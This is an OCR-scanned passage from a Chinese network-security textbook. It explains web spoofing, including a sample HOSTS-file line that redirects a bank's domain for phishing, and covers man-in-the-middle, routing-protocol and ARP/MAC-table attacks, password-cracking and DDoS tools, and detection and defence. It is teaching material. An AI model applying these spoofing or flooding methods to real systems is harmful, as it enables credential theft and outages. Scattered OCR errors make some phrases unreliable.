答 ,同时 记录 下 用 户 的 信息 ,并 给 这 个 用 户 一 个 cookie, 以 便 能 随时 跟踪 这 个 用 户 。 典 型 的 
例子 是 假冒 金融 机 构 ,偷盗 客户 的 信用 卡 信息 。 另 外 一 种 在 公共 主机 上 可 行 的 欺骗 是 修改 
Windows 的 HOSTS 文件 。 比 如 在 HOSTS 文件 中 增加 一 条 “192. 168. 1. 5 www. icbc. 
com. cn”, 那 么 所 有 在 此 计算 机 上 试图 通过 浏览 器 输入 域名 登录 工商 银行 的 用 户 实际 登录 
的 便 是 内 网 的 某 台 主机 ,再 辅 以 相似 的 网 站 风格 的 迷惑 ,用 户 便 会 输入 自己 的 账号 信息 , 进 
而 造成 重要 信息 泄露 。 

(2) man-in-the-middle 攻击 。 所 有 不 同类 型 的 攻击 都 能 使 用 man-in-the-middle 攻击 ， 
不 只 是 Web 欺骗 。 在 man-in-the-middle 攻击 中 ,攻击 者 A 必须 找到 自己 的 位 置 ,以 使 进出 
受害 方 B 的 所 有 流量 都 经 过 A。A 可 通过 攻击 外 部 路 由 器 来 实现 ,因为 所 有 进出 B 的 流量 
不 得 不 经 过 这 个 路 由 器 。 

man-in-the-middle 攻击 的 原理 是 ,攻击 者 A 通过 某 种 方法 (比如 攻破 DNS 服务 器 、 
DNS 欺骗 ,控制 路 由 器 ) 把 自己 的 机 器 设 成 目标 机 器 B 的 代理 服务 器 ,所 有 外 界 对 目标 机 器 
B 的 请 求 将 涌 向 A 的 机 器 ,这 时 A 可 以 转发 所 有 请 求 到 B, 让 B 进行 处 理 ,再 把 处 理 结果 返 
回 发 出 请 求 的 客户 机 。 这 样 ,所 有 外 界 进入 B 的 数据 流 都 在 A 的 监视 之 下 了 ,A 可 以 任意 
窃听 甚至 修改 数据 流 里 的 数据 ,进而 收集 到 大 量 的 信息 。 

(3) URL 重 写 。 在 URL 重 写 中 ,就 像 在 攻击 中 一 样 ,攻击 者 把 自己 插入 通信 流 中 , 唯 
一 不 同 的 是 ,在 攻击 中 , 当 流量 通过 互联 网 时 ,攻击 者 必须 在 物理 上 能 够 截取 它 。 这 有 时 非 
常 难于 执行 ,因此 攻击 者 使 用 URL EE ,把 网 络 流量 转 到 攻击 者 控制 的 另 一 个 站 点 上 。 

利用 URL 地 址 ,攻击 者 使 地 址 都 指向 自己 的 Web 服务 器 ,就 是 将 自己 的 Web 地 址 加 
在 所 有 URL 地 址 的 前 面 。 这 样 , 当 用 户 与 站 点 进行 安全 链接 时 ,就 会 毫 不 防备 地 进入 攻击 
者 的 服务 器 ,于 是 用 户 的 所 有 信息 便 处 于 攻击 者 的 监视 之 中 。 但 由 于 浏览 器 一 般 均 设 有 地 
址 栏 和 状态 栏 , 当 浏览 器 与 某 个 站 点 连接 时 ,可 以 在 地 址 栏 和 状态 样 中 获得 连接 中 的 Web 
站 点 地 址 及 其 相关 的 传输 信息 ,用户 往往 由 此 可 以 发 现 问题 ,所 以 攻击 者 往往 在 URL 地 址 
重 写 的 同时 利用 相关 信息 掩盖 技术 , 即 一 般 用 JavaScript 程序 来 重 写 地 址 栏 和 状态 栏 , 以 达 
到 其 掩盖 欺骗 的 目的 。 


5. 网 络 协议 攻击 


RFC 规范 的 不 完善 和 实现 上 的 缺陷 使 得 针对 网 络 协 议 的 攻击 成 为 可 能 。 

CD 攻击 类 型 如 下 所 述 。 

(D 针对 RIP 协议 的 攻击 。 

RIP, 即 路 由 信息 协议 ,是 通过 周期 性 (一 般 情况 下 为 30s) 的 路 由 更 新 报 文 来 维护 路 由 
表 的 。 一 台 运 行 RIP 路 由 协议 的 路 由 器 ,如 果 从 一 个 接口 上 接收 到 了 一 个 路 由 更 新 报 文 ， 
它 就 会 分 析 其 中 包含 的 路 由 信息 ,并 与 自己 的 路 由 表 作出 比较 ,如 果 该 路 由 器 认为 这 些 路 由 
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信息 比 自己 所 掌握 的 要 有 效 , 它 便 把 这 些 路 由 信息 引入 自己 的 路 由 表 中 。 这 样 如 果 一 个 攻 
击 者 向 一 台 运 行 RIP 协议 的 路 由 器 发 送 了 人 为 构造 的 带 破坏 性 的 路 由 更 新 报 文 ,就 很 容易 
地 把 路 由 器 的 路 由 表 搞 亲 乱 ,从 而 导致 网 络 中 断 。 如 果 运 行 RIP 路 由 协议 的 路 由 器 启用 了 
路 由 更 新 信息 的 HMAC 验证 , 则 可 从 很 大 程度 上 避免 这 种 攻击 。 

@ 针对 OSPF 路 由 协议 的 攻击 。 

OSPF , 即 开放 最 短路 径 优先 ,是 一 种 应 用 广泛 的 链 路 状态 路 由 协议 。 该 路 由 协议 基于 
链 路 状态 算法 ,具有 收敛 速度 快 .平稳 、 杜 绝 环 路 等 优点 ,十 分 适合 大 型 的 计算 机 网 络 使 用 。 
OSPF 路 由 协议 通过 建立 邻接 关系 来 交换 路 由 器 的 本 地 链 路 信息 ,然后 形成 一 个 整 网 的 链 
路 状态 数据 库 , 针 对 该 数据 库 , 路 由 器 就 可 以 很 容易 地 计算 出 路 由 表 。 

可 以 看 出 ,如 果 一 个 攻击 者 冒充 一 台 合法 路 由 器 与 网 络 中 的 一 台 路 由 器 建立 邻接 关系 ， 
并 向 攻击 路 由 器 输入 大 量 的 链 路 状态 广播 (LSA ,组 成 链 路 状态 数据 库 的 数据 单元 ) ,就 会 引 
导 路 由 器 形成 错误 的 网 络 拓扑 结构 ,从 而 导致 整个 网 络 的 路 由 表亲 乱 , 导 臻 整个 网 络 瘫 痪 。 

当前 版 本 的 Windows 操作 系统 都 实现 了 OSPF 路 由 协议 功能 ,因此 一 个 攻击 者 可 以 很 
容易 地 利用 这 些 操 作 系统 自 带 的 路 由 功能 模块 进行 攻击 。 与 RIP 类 似 , 如 果 OSPF 启用 了 
报 文 验证 功能 CHMAC 验证 ), 则 可 以 从 很 大 程度 上 避免 这 种 攻击 。 

© 针对 设备 转发 表 的 攻击 。 

为 了 合理 有 限 地 转发 数据 ,网 络 设 备 上 一 般 都 建立 一 些 寄存 器 表 项 ,比如 MAC 地 址 
X ARP 表 、 路 由 表 、 快 速 转发 表 以 及 一 些 基于 更 多 报 文 头 字 段 的 表格 (如 多 层 交 换 表 、 流 项 
目 表 等 )。 这 些 表 结 构 都 存储 在 设备 本 地 的 内 存 或 者 芯片 的 片上 内 存 中 ,数量 有 限 。 如 果 一 
个 攻击 者 通过 发 送 合适 的 数据 包 , 促 使 设备 建立 大 量 的 此 类 表格 ,就 会 使 设备 的 存储 结构 消 
耗 尽 ,从 而 不 能 正常 地 转发 数据 甚至 崩溃 。 

(2) 下 面 针 对 几 种 常见 的 表 项 ,介绍 其 攻击 原理 。 

(D 针对 MAC 地 址 表 的 攻击 。 

MAC 地 址 表 一 般 存 在 于 以 太 网 交换 机 上 ,以 太 网 通过 分 析 接 收 到 的 数据 帧 的 目的 
MAC 地 址 查询 本 地 的 MAC 地 址 表 , 然 后 作出 合适 的 转发 决定 。 

这 些 MAC 地 址 表 一 般 是 通过 学 习 获 取 的 ,交换 机 在 接收 到 一 个 数据 帧 后 ,有 一 个 学 习 
的 过 程 ,第 一 步 提取 数据 帧 的 源 MAC 地 址 和 接收 到 该 数据 帧 的 端口 号 ; 第 二 步 查 MAC 地 
址 表 , 看 该 MAC 地 址 是 否 存在 以 及 对 应 的 端口 是 否 符合 ; 第 三 步 ,如 果 该 MAC 地 址 在 本 
地 MAC 地 址 表 中 不 存在 , 则 创建 一 个 MAC 地 址 表 项 ,如 果 存 在 但 对 应 的 端口 跟 接收 到 该 
数据 帧 的 端口 不 符 , 则 更 新 该 表 ; 如 果 存 在 且 端 口 符合 , 则 进行 下 一 步 处 理 。 

分 析 这 个 过 程 可 以 看 出 ,如 果 一 个 攻击 者 向 一 台 交 换 机 发 送 大 量 源 MAC 地 址 不 同 的 
数据 帧 , 则 该 交换 机 就 可 能 把 自己 本 地 的 MAC 地 址 表 学 满 。 一 旦 MAC 地 址 表 溢 出 ,交换 
机 就 不 能 继续 学 习 正确 的 MAC 表 项 ,结果 可 能 是 产生 大 量 的 网 络 宛 余 数据 ,甚至 可 能 使 交 
换 机 骨 溃 。 而 构造 一 些 源 MAC 地 址 不 同 的 数据 帧 是 非常 容易 的 事情 。 

© 针对 ARP 表 的 攻击 。 

ARP 表 是 IP 地址 和 MAC 地 址 的 映射 关系 表 , 任 何 实现 了 IP 协议 栈 的 设备 ,一般 情况 
下 都 通过 该 表 维 护 IP 地 址 和 MAC 地 址 的 对 应 关系 ,这 是 为 了 避免 ARP 解析 而 形成 的 广 
播 数据 报 文 对 网 络 形 成 冲击 。ARP 表 的 建立 一 般 情况 下 通过 两 个 途径 即 主动 解析 和 被 动 
请 求 。 


如 果 一 台 计算 机 想 与 另外 一 台 不 知道 MAC 地 址 的 计算 机 通信 , 则 该 计算 机 主动 发 
ARP 请 求 , 通 过 ARP 协议 建立 (前 提 是 这 两 台 计算 机 位 于 同一 个 IP 子 网 上 ) 对 应 关系 ; 如 
果 一 台 计 算 机 接收 到 了 一 台 计 算 机 的 ARP 请 求 , 则 首先 在 本 地 建立 请 求 计算 机 的 IP 地 址 
和 MAC 地 址 的 对 应 表 。 因 此 ,如 果 一 个 攻击 者 通过 变换 不 同 的 IP 地 址 和 MAC 地 址 向 同 
一 台 设 备 (比如 三 层 交换 机 ) 发 送 大 量 的 ARP 请 求 , 则 被 攻击 设备 可 能 会 因为 ARP 缓存 洲 
出 而 崩溃 。 

针对 ARP 表 项 ,还 有 一 个 可 能 的 攻击 就 是 误导 计算 机 建立 正确 的 ARP 表 。 根 据 ARP 
协议 ,如 果 一 台 计 算 机 接收 到 了 一 个 ARP 请 求 报 文 , 如 果 发 起 该 ARP 请 求 的 TP 地 址 在 自 
己 本 地 的 ARP 缓存 中 ,并 且 请 求 的 目标 IP 地 址 不 是 自己 的 ,该 计算 机 会 用 ARP 请 求 报 文 
中 的 源 IP 地址 和 源 MAC 地 址 更 新 自己 的 ARP 缓存 。 例 如 ,假设 有 三 台 计 算 机 A、B、C, 其 
中 B 已 经 正确 建立 了 A 和 C 计 算 机 的 ARP 表 项 。 假设 A 是 攻击 者 ,A 发 出 一 个 ARP 请 
求 报 文 ,该 请 求 报 文 构造 为 源 IP 地 址 是 C 的 IP 地 址 , 源 MAC 地 址 是 A 的 MAC 地址; 请 
求 的 目标 IP 地 址 是 A 的 IP 地 址 。 计 算 机 B 在 收 到 这 个 ARP 请 求 报 文 后 (ARP 请 求 是 广 
播报 文 ,网 络 上 所 有 设备 都 能 收 到 ) ,发 现 A 的 ARP 表 项 已 经 在 自己 的 缓存 中 ,但 MAC 地 
址 与 收 到 的 请 求 的 源 MAC 地 址 不 符 , 于 是 根据 ARP 协议 使 用 ARP 请 求 的 源 MAC 地 址 
CHI A f] MAC 地 址 ) 更 新 自己 的 ARP 表 。 这 样 B 的 ARP 混 存 中 就 存在 这 样 的 错误 ARP 
KW: C 的 IP 地 址 跟 A 的 MAC 地 址 对 应 。 这 样 的 结果 是 B 发 给 C 的 数据 都 被 计算 机 A 
接收 到 。 

© 针对 流 项 目 表 的 攻击 。 

有 的 网 络 设备 为 了 加 快 转发 效率 ,建立 了 所 谓 的 流 缓存 。 所 谓 流 ,可 以 理解 为 一 台 计算 
机 的 一 个 进程 到 另外 一 台 计 算 机 的 一 个 进程 之 间 的 数据 流 。 如 果 表 现在 TCP/IP 协议 上 ， 
则 是 由 源 IP 地 址 、 目 的 TP 地 址 .协议 号 、 源 端口 号 .目的 端口 号 五 元 组 共同 确定 的 所 有 数据 
报 文 。 

一 个 流 缓 存 表 一 般 由 该 五 元 组 为 索引 ,每 当 设备 接收 到 一 个 IP 报 文 ,都 会 首先 分 析 IP 
报头 ,把 对 应 的 五 元 组 数据 提取 出 来 ,进行 一 个 Hash 运算 。 然 后 根据 运算 结果 查询 流 组 
存 , 如 果 查 找 成 功 , 则 根据 查找 的 结果 进行 处 理 ; 如 果 查 找 失败 , 则 新 建 一 个 流 缓存 项 , 查 路 
由 表 , 根 据 路 由 表 查 询 结 果 填 完整 这 个 流 缓存 ,然后 对 数据 报 文 进行 转发 (具体 转发 是 在 流 
项 目 创建 前 还 是 创建 后 并 不 重要 )。 

可 以 看 出 ,如 果 一 个 攻击 者 发 出 大 量 的 源 IP 地 址 或 者 目的 IP 地 址 变化 的 数据 报 文 ,就 
可 能 导致 设备 创建 大 量 的 流 项 目 , 因 为 不 同 的 源 IP 地 址 和 不 同 的 目标 IP 地 址 对 应 不 同 的 
流 , 所 以 可 能 导致 流 缓存 溢出 。 


6. WWW 攻击 


WWW 的 广泛 使 用 ,使 得 针对 WWW 的 攻击 非常 普遍 ,通常 分 为 静态 的 漏洞 攻击 和 动 
态 的 漏洞 攻击 ,包括 利用 统计 学 原理 和 模糊 逻辑 学 技术 的 HTTP 指纹 识别 工具 httpprint 
收集 服务 器 信息 等 。 


7. APT 攻击 


APT 攻击 (Advanced Persistent Threat, 高 级 持续 威胁 ) 是 组 织 团体 利用 先进 的 计算 机 
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网 络 攻击 手段 对 特定 高 价值 数据 目标 进行 长 期 持续 性 网 络 侵害 的 攻击 形式 。APT 攻击 的 
原理 相对 于 其 他 常见 的 网 络 攻击 形式 更 为 高 级 和 先进 ,其 高 级 性 主要 体现 在 APT 在 发 动 
攻击 之 前 ,需要 对 攻击 对 象 的 业务 流程 和 目标 系统 进行 精确 的 情报 收集 ,在 收集 过 程 中 , 攻 
击 者 会 主动 挖掘 被 攻击 对 象 受信 系统 和 应 用 程序 的 漏洞 ,在 这 些 漏洞 的 基础 上 形成 攻击 者 
所 需 的 C&C 网 络 ,此 种 行为 没有 采取 任何 可 能 触发 警报 或 者 引起 怀疑 的 行动 ,因此 更 接近 
于 融入 被 攻击 者 的 系统 或 程序 ,如 图 5-3 所 示 。 


0O-. 


攻击 者 


WH: @@@@ 为 入侵 流程 ， 鲜 为 信息 泄露 途径 
图 5-3 攻击 示意 


5.1.2 网 络 攻 击 的 常用 工具 
1. 通用 目标 侦查 工具 


(1) ping: 将 ICMP ECHO 请 求 消息 发 给 目标 ,判断 其 否 是 否 可 达 , 并 计算 应 答 的 时 间 。 
(2) Nslookup: 查询 DNS 服务 器 ,以 找到 与 IP 地 址 映射 的 域 。 

(3) Traceroute: 返回 源 计 算 机 与 选择 的 目标 之 间 的 路 由 器 的 一 个 列表 。 

(4) Finger: 查询 一 个 系统 ,决定 它 的 用 户 列 表 。 


2. 端口 扫描 工具 


常用 的 端口 扫描 工具 有 NSS、SATAN、SuperScan 等 。 

(1) NSS( 网 络 安全 扫描 器 ) 是 一 个 非常 隐 项 的 扫描 器 。NSS 用 Perl 语言 编写 ,工作 在 
SunOS, nJ PAX} Sendmail, TFTP, Æ% FTP、Hosts 和 Xhost 扫描 。 

(2) SATAN( 安 全 管理 员 的 网 络 分 析 工 具 ) 是 一 个 分 析 网 络 的 安全 管理 ,并 进行 测试 与 
报告 的 工具 。 它 用 来 收集 网 络 上 主机 的 许多 信息 ,可 以 识别 并 且 自 动 报告 与 网 络 相关 的 安 


全 问题 。 

(3) SuperScan 是 著名 安全 公司 Foundstone 出 品 的 一 款 功能 强大 的 基于 连接 的 TCP 
端口 扫描 工具 ,支持 ping 和 主机 名 解析 。 

(4) Nmap 由 Fyodor 编写 ,提供 TCP,UDP 端口 扫描 和 操作 系统 指纹 识别 的 功能 。 它 
集成 了 多 种 扫描 技巧 ,提供 的 端口 扫描 功能 比较 全 面 ,而 且 能 够 对 操作 系统 进行 指纹 识别 ， 
是 目前 国外 最 为 流行 的 端口 扫描 工具 之 一 。 


3. 网 络 监听 工具 


网 络 监听 工具 可 理解 为 一 种 安装 在 计算 机 上 的 窃听 设备 ,可 以 用 来 穷 听 计 算 机 在 网 络 
上 发 送 和 接收 到 的 数据 。 这 些 数据 可 以 是 用 户 的 账号 和 密码 ,也 可 以 是 机 密 数据 等 。 

常用 的 网 络 监听 工具 有 X-Scan,Sniffer, NetXray tcpdump, winpcap 及 流光 等 。 

(1) X-Scan 是 安全 焦点 (Xfocus) 的 力作 ,采用 多 线程 方式 对 指定 IP 地 址 段 (或 单机 ) 进 
行 安全 漏洞 检测 ,支持 插件 功能 ,可 应 用 于 Windows NT/2000/XP/2003 平台。 

(2) Sniffer 是 利用 计算 机 的 网 络 接口 截获 目的 地 为 其 他 计算 机 的 以 明文 方式 传送 的 数 
据 报 文 的 一 种 工具 ,应 用 于 网 络 管理 主要 是 分 析 网 络 的 流量 ,以 便 找 出 所 关心 的 网 络 中 潜在 
的 问题 。 


4. 密码 破解 工具 


密码 破解 工具 其 实 是 一 个 能 将 口令 解 译 出 来 ,或 者 让 口令 保护 失效 的 程序 。 

(1) Windows NT 和 Windows 2000 密码 破解 工具 主要 包括 如 下 几 种 。 

LOphtcrack。LOphtcrack(LC) 是 一 个 Windows NT 密码 审计 工具 ,能 根据 操作 系统 

中 存储 的 加 密 哈 希 计算 Windows NT 密码 ,功能 非常 强大 、 丰 富 ,是 目前 市 面 上 最 好 

的 Windows NT 密码 破解 程序 之 一 。 

NTSweep。NTSweep 使 用 的 方法 和 其 他 密码 破解 程序 不 同 , 它 不 是 下 载 密码 并 离 

线 破解 ,而 是 利用 Microsoft 允许 用 户 改变 密码 的 机 制 。 它 首先 取 定 一 个 单词 ,然后 

使 用 这 个 单词 作为 账号 的 原始 密码 ,并 试图 把 用 户 的 密码 改 为 同一 个 单词 。 因 为 是 

成 功 地 把 密码 改 成 原来 的 值 ,用 户 永 远 不 会 知道 密码 曾经 被 人 修改 过 。 

PWDump。PWDump 不 是 一 个 密码 破解 程序 ,但 是 它 能 用 来 从 SAM 数据 库 中 提取 

密码 (Hash) 。 

(2) UNIX 密码 破解 工具 主要 有 如 下 几 种 。 

* Crack, Crack 是 一 个 旨 在 快速 定位 UNIX 密码 弱点 的 密码 破解 程序 。Crack 使 用 
标准 的 猜测 技术 确定 密码 ,检查 密码 是 否 和 user id 相同 .是 否 单词 password, k: # 
数字 串 ,是否 字母 串 。Crack 通过 加 密 一 长 串 可 能 的 密码 ,并 把 结果 和 用 户 的 加 密 
密码 相 比较 ,看 其 是 否 匹 配 。 用 户 的 加 密 密 码 必须 是 在 运行 破解 程序 之 前 就 已 经 提 
供 的 。 

* John the Ripper。 该 程序 是 UNIX 密码 破解 程序 ,但 也 能 在 Windows 平台 运行 , 功 

能 强大 ,运行 速度 快 ,可 进行 字典 攻击 和 强行 攻击 。 

XIT. XIT 是 一 个 执行 词典 攻击 的 UNIX 密码 破解 程序 。XIT 的 功能 有 限 , 因 为 它 

只 能 运行 词典 攻击 ,但 程序 很 小 ,运行 很 快 。 


S; 


实践 


Slurpie。Slurpie 能 执行 词典 攻击 和 定制 的 强行 攻击 ,要 规定 所 需要 使 用 的 字符 数 
目 和 字符 类 型 。 和 John, Crack 相 比 ,Slurpie 的 最 大 优点 是 它 能 分 布 运行 ,能 把 几 
台 计 算 机 组 成 一 台 分 布 式 虚拟 机 器 在 很 短 的 时 间 里 完成 破解 任务 。 


拒绝 服务 攻击 工具 


(1) 拒绝 服务 攻击 是 最 容易 实施 的 攻击 行为 ,常见 的 攻击 方式 有 死亡 之 ping, Teardrop , 
TCP SYN 洪水 、Land、Smurf 等 。 


死亡 之 ping(ping of death) 攻 击 的 原理 基于 一 般 路 由 器 对 包 的 最 大 大 小 有 限制 ( 通 
常 是 在 64KB 以 内 ) , 当 收 到 大 小 超过 64KB 的 ICMP 包 时 就 会 出 现 内 存 分 配 错误 ， 
导致 TCP/IP 堆栈 崩 演 ,从 而 使 接收 方 计算 机 宕 机 。 利 用 这 一 机 制 ,黑客 们 只 需 不 
断 地 通过 ping 命令 向 攻击 目标 发 送 超过 64KB 的 数据 包 , 即 可 最 终 使 目标 计算 机 的 
TCP/IP 堆栈 崩溃 。 

实施 Teardrop 攻击 的 黑客 们 在 截取 IP 数据 包 后 ,把 偏 移 字段 设置 成 不 正确 的 值 ， 
这 样 接收 端 在 收 到 这 些 分 拆 的 数据 包 后 就 不 能 按 数据 包 中 的 偏 移 字段 值 正 确 重合 
这 些 拆 分 的 数据 包 , 但 接收 端 会 不 断 地 尝试 ,这 样 就 可 能 致使 目标 计算 机 操作 系统 
因 资 源 耗 尽 而 崩溃 。 

TCP SYN 洪水 (TCP SYN Flood) 攻 击 的 原理 来 源 就 是 TCP/IP 协议 栈 只 能 等 待 有 
限 数量 的 ACK( 应 答 ) 消 息 ,因为 每 台 计 算 机 用 于 创建 TCP/IP 连接 的 内 存 缓冲 区 
都 是 非常 有 限 的 ,如 果 这 一 缓冲 区 充满 了 等 待 响应 的 初始 信息 , 则 该 计算 机 就 会 对 
接 下 来 的 连接 停止 响应 ,直到 缓冲 区 里 的 连接 超时 。 

Land 攻击 中 的 数据 包 源 地 址 和 目标 地 址 是 相同 的 , 当 操作 系统 接收 到 这 类 数据 包 
时 ,不 知道 该 如 何 处 理 , 或 者 循环 发 送 和 接收 该 数据 包 , 导 致 消耗 大 量 的 系统 资源 ， 
从 而 有 可 能 造成 系统 骨 溃 或 死机 等 现象 。 

Smurf 攻击 利用 了 多 数 路 由 器 中 具有 的 同时 向 许多 计算 机 广播 请 求 的 功能 。 攻 击 
者 伪造 一 个 合法 的 IP 地 址 ,然后 由 网 络 上 的 所 有 路 由 器 广播 要 求 向 受 攻击 计算 机 
地 址 做 出 回答 的 请 求 。 由 于 这 些 数据 包 表 面 上 看 是 来 自己 知 地 址 的 合法 请 求 , 因 此 
网 络 中 的 所 有 系统 向 这 个 地 址 做 出 回答 ,最 终结 果 可 能 是 该 网 络 的 所 有 主机 都 对 此 
ICMP 应 答 请 求 作出 答复 ,导致 网 络 阻塞 。 


(2) 攻击 者 常用 的 DDoS 工具 有 TFN (Tribe Flood Network), TFN2k (Tribe Flood 
Network 2000) , Trinoo, Stacheldraht/stacheldrahtv4 , mstream 及 shaft, 下 面 简单 介绍 其 中 


3 种 。 


TFN 是 德国 著名 黑客 Mixter 编写 的 DDoS TH., TEN 由 客户 端 程序 与 守护 程序 
组 成 ,通过 提供 绑 定 到 TCP 端口 的 root shell 控制 ,实施 icmp flood, syn flood, udp 
flood 与 smurf 等 多 种 拒绝 服务 的 分 布 式 网 络 攻击 。 

TFN2K 是 由 德国 著名 黑客 Mixter 编写 的 攻击 工具 TEN 的 后 续 版 本 ,通过 主 控 端 
利用 大 量 代理 端 主机 的 资源 进行 对 一 个 或 多 个 目标 进行 协同 攻击 。 

Trinoo 是 基于 UDP flood 的 攻击 软件 , 它 向 被 攻击 目标 主机 随机 端口 发 送 全 零 的 4 
FW UDP 包 , 被 攻击 主机 的 网 络 性 能 在 处 理 这 些 超 出 其 处 理 能 力 的 垃圾 数据 包 的 
过 程 中 不 断 下 降 ,直至 不 能 提供 正常 服务 甚至 崩溃 。 


5.2 网 络 攻击 检测 技术 


攻击 检测 技术 可 以 帮助 系统 对 付 网 络 攻击 ,扩展 系统 管理 员 的 安全 管理 能 力 ,提高 信息 
安全 基础 结构 的 完整 性 。 它 在 不 影响 网 络 性 能 的 情况 下 对 网 络 进行 监控 ,从 而 提供 对 内 部 
攻击 、 外 部 攻击 和 误 操作 的 实时 防御 ,具体 的 任务 如 下 所 述 。 

。 监视 .分 析 用 户 及 系统 活动 。 

° 系统 构造 和 弱点 审计 。 

。 识别 反映 已 进攻 的 活动 规模 并 报警 。 

。 异常 行为 模式 的 统计 分 析 。 

。 评估 重要 系统 和 数据 文件 的 完整 性 。 

。 操作 系统 的 审计 跟踪 管理 ,并 识别 用 户 违 反 安全 策略 的 行为 。 

检测 攻击 的 思路 分 为 利用 数据 流 特征 、 检 测 本 地 权限 攻击 、 后 门 留 置 检测 3 方面 。 


1. 利用 数据 流 特征 检测 攻击 


扫描 时 ,攻击 者 首先 需要 自己 构造 用 来 扫描 的 IP 数据 包 , 通 过 发 送 正常 的 和 不 正常 的 
数据 包 达 到 计算 机 端口 ,再 等 待 端口 对 其 响应 ,利用 响应 的 结果 作为 鉴别 依据 。 为 了 让 IDS 
系统 能 够 比较 准确 地 检测 到 系统 遭受 了 网 络 扫描 ,可 以 考虑 下 面 几 种 思路 。 

CD 特征 匹配 。 找 到 扫描 攻击 时 数据 包 中 含有 的 数据 特征 ,可 以 通过 分 析 网 络 信息 包 
中 是 否 含有 端口 扫描 特征 的 数据 来 检测 端口 扫描 是 否 存在 。 

(2) 统计 分 析 。 预 先 定义 一 个 时 间 段 ,如 果 在 这 个 时 间 段 内 发 现 了 超过 某 一 预定 值 的 
连接 次 数 , 则 认为 是 端口 扫描 。 

(3) 系统 分 析 。 若 攻击 者 对 同一 主机 使 用 缓慢 的 分 布 式 扫描 方法 ,间隔 时 间 足 够 让 入 
侵 检 测 系统 忽略 ,不 按 顺 序 扫描 整个 网 段 ,将 探测 步骤 分 散在 几 个 会 话 中 ,不 导致 系统 或 网 
络 出 现 明显 异常 ,不 导致 日 志 系统 快速 增加 记录 ,那么 这 种 扫描 将 是 比较 隐秘 的 。 通 过 上 述 
简单 的 统计 分 析 方 法 将 不 能 检测 到 它们 的 存在 。 但 是 从 理论 上 来 说 ,扫描 是 无 法 绝对 隐秘 
的 ,车 能 对 收集 到 的 长 期 数据 进行 系统 分 析 , 便 可 以 检测 出 缓慢 和 分 布 式 的 扫描 。 


2. 检测 本 地 权限 攻击 


CO 行为 监测 法 。 由 于 溢出 程序 有 些 行为 在 正常 程序 中 比较 罕见 ,因此 可 以 根据 溢出 
程序 的 共同 行为 制定 规则 条 件 , 如 果 符 合 现 有 的 条 件 规则 ,就 认为 是 溢出 程序 。 行 为 监测 法 
可 以 检测 未 知 溢出 程序 ,但 实现 起 来 有 一 定 难 度 , 不 容易 考虑 周全 。 行为 监测 法 一 方面 监控 
内 存活 动 ,跟踪 内 存 容量 的 异常 变化 ,对 中 断 向 量 进行 监控 、 检 测 ; 另 一 方面 跟踪 程序 进程 
的 堆栈 变化 ,维护 程序 运行 期 的 堆栈 合法 性 ,以 防御 本 地 溢出 攻击 和 竞争 条 件 攻击 。 

(2) 监测 敏感 目录 和 敏感 类 型 的 文件 。 对 来 自 WWW 服务 的 脚本 执行 目录 ftp 服务 
目录 等 敏感 目录 的 可 执行 文件 的 运行 进行 拦截 ,仲裁 ; 对 这 些 目 录 的 文件 写 人 操作 进行 审 
计 , 阻 止 非法 程序 的 上 传 和 写 入 ; 监测 来 自 系 统 服 务 程序 的 命令 的 执行 ; 对 数据 库 服 务 程 
序 的 有 关 接 口 进 行 控 制 , 防 止 通过 系统 服务 程序 进行 的 权限 提升 ; 监测 注册 表 的 访问 ,采用 
特征 码 检测 的 方法 阻止 木马 和 攻击 程序 的 运行 。 


实践 


(3) 文件 完备 性 检查 。 对 系统 文件 和 常用 库 文件 做 定期 的 完备 性 检查 。 可 以 采用 
checksum 的 方式 ,对 重要 文件 做 先 验 快照 ,检测 对 这 些 文件 的 访问 ,对 这 些 文件 的 完备 性 作 
检查 ,结合 行为 检测 的 方法 防止 文件 覆盖 攻击 和 欺骗 攻击 。 

(4) 系统 快照 对 比 检查 。 对 系统 中 的 公共 信息 (如 系统 的 配置 参数 、 环 境 变 量 ) 做 先 验 
快照 , 检测 对 这 些 系统 变量 的 访问 ,防止 自 改 导向 攻击 。 

(5) 虚拟 机 技术 。 通 过 构造 虚拟 x86 计算 机 的 寄存 器 表 、 指 令 对 照 表 和 虚拟 内 存 , 能 够 
让 具有 溢出 敏感 特征 的 程序 在 虚拟 机 中 运行 一 段 时 间 。 这 一 过 程 可 以 提取 被 怀疑 有 可 能 是 
溢出 程序 或 与 溢出 程序 相似 的 行为 ,比如 可 疑 的 跳 转 等 和 正常 计算 机 程序 不 一 样 的 地 方 ,再 
结合 特征 码 扫描 法 将 已 知 溢出 程序 代码 特征 库 的 先 验 知识 应 用 到 虚拟 机 的 运行 结果 中 , 完 
成 对 一 个 特定 攻击 行为 的 判定 。 目 前 国际 上 公认 的 、 并 已 经 实现 的 虚拟 机 技术 在 未 知 攻击 
的 判定 上 可 达到 80% 左 右 的 准确 率 。 


3. 后 门 留置 检测 的 技术 


常用 的 检测 木马 可 疑 踪迹 和 蜡 常 行为 的 方法 包括 对 比 检测 法 ,文件 防 复 改 法 、 系 统 资源 
监测 法 和 协议 分 析 法 等 。 


5.3 网 络 安全 的 防范 
5.3.1 网 络 安全 策略 


1. 物理 安全 策略 


物理 安全 策略 的 目的 是 保护 计算 机 系统 、 网 络 服务 器 .打印 机 等 硬件 实体 和 通信 链 路 免 
受 自然 灾害 、 人 为 破坏 和 搭 线 攻 击 ; 验证 用 户 的 身份 和 使 用 权限 ,防止 用 户 越权 操作 ; 确保 
计算 机 系统 有 一 个 良好 的 电磁 兼容 工作 环境 ; 建立 完备 的 安全 管理 制度 ,防止 非法 进入 计 
算 机 控制 室 和 各 种 偷窃 破坏 活动 的 发 生 。 

抑制 和 防止 电磁 泄露 ( 即 TEMPEST 技术 ) 是 物理 安全 策略 的 一 个 主要 问题 ,目前 主要 
防护 措施 有 两 类 。 一 类 是 对 传导 发 射 的 防护 ,主要 对 电源 线 和 信号 线 加 装 性 能 良好 的 滤波 
器 , 减 小 传输 阻抗 和 导线 间 的 交叉 契合 ; 另 一 类 是 对 辐射 的 防护 ,这 类 防护 措施 又 可 分 为 两 
种 ,一 是 采用 各 种 电磁 屏蔽 措施 ,如 对 设备 的 金属 屏蔽 和 各 种 接 插 件 的 屏 项 ,同时 对 机 房 的 
下 水 管 . 暖 气管 和 金属 门窗 进行 屏蔽 和 隔离 ; 二 是 干扰 的 防护 措施 , 即 在 计算 机 系统 工作 的 
同时 ,利用 干扰 装置 产生 一 种 与 计算 机 系统 辐射 相关 的 伪 噪 声 向 空间 辐射 来 掩盖 计算 机 系 
统 的 工作 频率 和 信息 特征 。 


2. 访问 控制 策略 


